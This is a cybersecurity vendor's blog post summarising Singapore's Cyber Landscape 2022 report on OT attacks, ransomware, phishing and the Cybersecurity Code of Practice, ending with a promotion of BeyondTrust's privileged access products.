Cyber threats such as ransomware, attacks on operational technology (OT) and manufacturing, and phishing headlined the recently released Singapore Cyber Landscape 2022 report, published by the Cyber Security Agency (CSA) of Singapore.
The annual report focuses on:
- The key trends CSA is seeing in the Singaporean cyber landscape
- Global trends that are likely to impact Singapore
- How the Singaporean government is helping the country’s businesses and citizens defend themselves against cyber threats.
This blog post will dig into the threats called out in the report and discuss how organizations can strengthen their cyber defenses and mitigate risks in relation to these threats. Let's take a look at the top three cyber challenges highlighted by the CSA report.
1. Operational Technology (OT) attacks are a national security concern
The growing impact of cyber threats on operational technology (OT) is highlighted as a key concern of CSA in the report.
OT systems interact with machinery and automated industrial applications that are often involved in the provision of essential services. Compromise to these systems could result in complete or partial shutdown of important equipment, which could lead to physical damages, financial losses, essential service disruptions, and potential harm to human lives. The high potential for disruption and destruction has caused them to be regarded as a national security concern. However, despite their high priority, the number of threat vectors impacting OT systems are rapidly increasing, and digital transformation is playing a key part.
IIoT and the technological advancement of operational technologies
The CSA report highlights the challenges of new attack vectors that are being introduced by new technological advances in OT systems (for example, Industrial Internet of Things, or IIoT) that are allowing these systems to establish unsecured connections to the organization’s IT infrastructure without being managed by IT security protocols.
Traditionally, the key strategy in the prevention of risk to OT systems involved keeping them separate from Internet-facing IT systems. Today, technological advances are making it difficult to prevent OT systems from accessing the internet, and that is exposing them to growing risk--and driving the need for OT / IT convergence. From industrial equipment that is now being monitored by IIoT to smart coffee makers that are connecting to the office Wi-Fi in the company lunchroom, the attack vector for OT organizations is rapidly expanding, and threat actors are taking notice.
A decade ago, we saw the impact of unsecured connections between IT and OT play out in the massive Target attack in the U.S. In that instance, an HVAC (heating, ventilation, and air conditioning) vendor’s systems had been compromised and their remote connection to the retailer’s system for maintenance and monitoring provided eventual access to the Point-of-Sale terminals. The attacker eventually collected the credit card information of 40 million customers.
Remote access to OT systems
In recent years, many organizations have invested heavily in digital transformation initiatives, looking to improve customer experience while gaining benefits in productivity. A large part of these initiatives involved the provisioning of remote access to IT systems and OT systems, as well as a convergence between the two environments.
Whether for employees or third-party suppliers, remote access has often been permitted via VPN (virtual private network). The problem is that, in many cases, using a VPN fails when it comes to the principle of least privilege—a key part of a zero trust security posture. VPNs often provide all-or-nothing access, with little ability to see who did what and when.
In the past, a third-party employee coming on-site to access IT or OT would be accompanied by another employee—and perhaps even monitored while they worked on sensitive systems. A VPN provides the equivalent of picking up a visitor’s badge at reception, using it to gain access into the entire system, sensitive or not, and then simply checking out when done.
How are organizations defending their OT environments?
In response to the added risk imposed by digital transformation and remote access initiatives, many organizations are adopting a zero trust approach to cybersecurity. Privilege Access Management (PAM)—and in particular, solutions like Privileged Remote Access that can offer organizations granular control of who has access to what parts of their system—with the ability to provide a full audit trail – can help, whether for IT or OT connections.
2. Ransomware poses a near-universal cyberthreat
Sometimes the impact of a cyberattack on operational technology is indirect. For example, the Colonial Pipeline ransomware attack initiated the shutdown of the pipeline because the organization was unable to use their billing system. This brings us onto the next topic: Ransomware.
In 2022, the Singapore Cyber Emergency Response Team (SingCERT) received reports on 132 cases of ransomware attacks—and the CSA report calls out the manufacturing and retail sectors as particular targets for these attacks. It is important to note that this figure probably underrepresents the total number of ransomware incidents that occurred in 2022. Not every victim of ransomware reports an attack. In fact, the CSA report references an estimate by the FBI that suggests only 20% of US ransomware victims reached out to law enforcement to report the attack.
Why are ransomware attacks so universally pervasive?
The CSA report lists a number of reasons for why ransomware attacks continue to dominate the threat landscape.
- Ransomware-as-a-service (RaaS) is becoming more sophisticated and more accessible. Now, anyone with access to enough money to buy such a service can launch an attack.
- As ransomware becomes a more established and profitable business model, ransomware groups, including the likes of Lockbit, are becoming more professional, diversifying their portfolios (attack techniques) and adopting more aggressive negotiation tactics.
- Ransomware attacks have branched out from targeting Windows to include cloud environments and Linux systems. According to a Trend Micro statistic cited by the report, in 2022, there was an increase of over 600% in instances where Linux systems were targeted.
- Malware-free attacks are becoming more common. Also known as “Living off the Land” (LoTL) or fileless malware techniques, these attacks leverage legitimate system applications, such as PowerShell, to execute the attack.
- Infrastructure expansion and expanded utilization of cloud, multicloud, remote work, bring your own device (BYOD), and other digital transformation initiatives has significantly increased exposure to vulnerabilities. The amount of shadow IT, human and machine identities, and privileges are higher and harder to manage than ever. Ransomware attackers have been quick to capitalize.
How can organizations protect themselves from ransomware?
Through a combination of privilege management (eliminating unnecessary privileges and removing admin rights) and application control (ensuring only legitimate, approved applications can execute or communicate), organizations can enforce the principle of least privilege to prevent attackers from exploiting native system tools. This can be done not just for Windows systems, but also for Mac, Unix, and Linux environments, providing comprehensive coverage for all organizations across their traditional, cloud, and hybrid environments.
3. Phishing scams remain the top scam type in Singapore
Phishing attacks increased substantially in Singapore last year, with SingCERT recording 8,500 attempts, an increase of over 170%, year on year.
The most spoofed industries, according to CSA, were banking and financial services, government, including the Inland Revenue Authority of Singapore, and logistics, where phishing attempts include missed delivery notifications or shipment issues.
Where it targets individuals, phishing is often used to collect information that allows identity theft or fraud to readily take place. However, phishing also impacts organizations, often representing the first step in a ransomware attack.
The goal is to gain the credentials needed to access an organization’s networks. From there, the attacker will move laterally as needed until they can gain access to restricted information or systems where they can spread malware infections, corrupt data, or steal data or identities.
How can you protect your organization from phishing scams?
There are basic best practices that can be followed to protect your organization from phishing attacks. However, given the ongoing success of phishing attacks, and the improving quality of the emails received by victims, especially with the use of generative AI, even the best trained employees may slip up from time to time. It is important to provide additional layers of defense, including the removal of admin privileges on endpoints to prevent attackers from gaining access to sensitive data and systems, and application control to block the execution of malicious payloads. Both of these strategies will deny phishers the access that they need to escalate their attack.
What is the CCoP (Cybersecurity Code of Practice) and how can it help?
Initially released in 2018 and later revised in July and December of 2022, the Cybersecurity Code of Practice for Critical Information Infrastructure designates a set of mandatory practices for the owners of Critical Information Infrastructure (CII), across the eleven CII sectors defined in the associated Cybersecurity Act 2018.
The CCoP was issued as a key effort in Singapore’s cybersecurity strategy, which seeks to actively defend Singapore’s cyberspace, simplify cybersecurity for end-users, and promote the development of international cyber norms and standards. Details of this strategy are outlined more extensively in the Singapore Cyber Landscape 2022 report.
The CCoP represents the first step in the first pillar of the cybersecurity strategy, which is focused on strengthening the resilience of digital infrastructure.
The main objectives of the latest edition of the CCoP are to:
- Adopt a threat-based approach to identify threat actors’ common tactics and techniques.
- Enhance agility in addressing emerging risks
The owners of CII are required to conduct audits to ensure compliance with the Act. They are also required to provide, within 30 days of the finding, a remediation plan to the Singapore Commissioner of Cybersecurity.
What role can BeyondTrust play in the CCoP?
BeyondTrust’s Intelligent Identity and Access Security solutions are specifically designed to provide advanced Privileged Access Management, system hardening, and OT architecture and security--all key areas covered in the CCoP.
BeyondTrust’s Singapore team is already assisting a number of customers in meeting requirements of CCoP, including those mentioned above. If you would like to learn more about our work in this space, please reach out to our team.
Peter Vasey, Director, Marketing, APJ
With a passion for cybersecurity, Peter has spent more than 20 years in the IT industry helping to educate the market regarding solutions from the likes of Cisco, Symantec and LastPass. Peter joined BeyondTrust in 2021, responsible for APJ marketing, and is a member of the Australian Information Security Association (AISA).